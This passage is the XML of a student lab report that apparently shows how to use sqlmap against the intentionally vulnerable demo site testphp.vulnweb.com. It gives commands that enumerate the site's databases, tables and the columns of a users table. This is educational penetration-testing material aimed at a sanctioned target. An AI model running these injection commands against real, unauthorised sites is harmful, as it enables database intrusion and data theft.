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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task-11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bhumireddy Thanmaye 21BCI0013</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sqlmap using vulnweb demo site </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we are using sql injection technique using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool in kali linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is SQL injection?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool used for ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLmap is an open-source tool that automatically finds and exploits SQL injection vulnerabilities. We can use it to test web applications for SQL injection vulnerabilities and gain access to a vulnerable database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tool Used:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Website url:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://testphp.vulnweb.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, go to kali linux click on sqlmap in applications or type sqlmap in terminal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3033713" cy="1639845"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="55421" l="10642" r="50307" t="8433"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3033713" cy="163984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left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do the sqlmap for following commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents url </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-dbs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for retrieve the databases in the website </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6215063" cy="4123550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="7969" l="10096" r="21794" t="7101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6215063" cy="412355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left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we can see the databases retrieved from the website one is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">acuart </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and the other is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also we can know the Operating system of web server is linux ubuntu and DBMS is MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to specify the database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here in this case acuart is specified after -D </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">–tables </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to check whether the tables available in the database or not</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here 8 table are retrieved from database acuart as we can see in the given picture below </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6024563" cy="4058801"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="5421" l="8974" r="22756" t="8132"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6024563" cy="405880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left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users --columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4681538" cy="3196925"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="4891" l="10096" r="22275" t="8063"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4681538" cy="31969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left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> represent the specific table </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
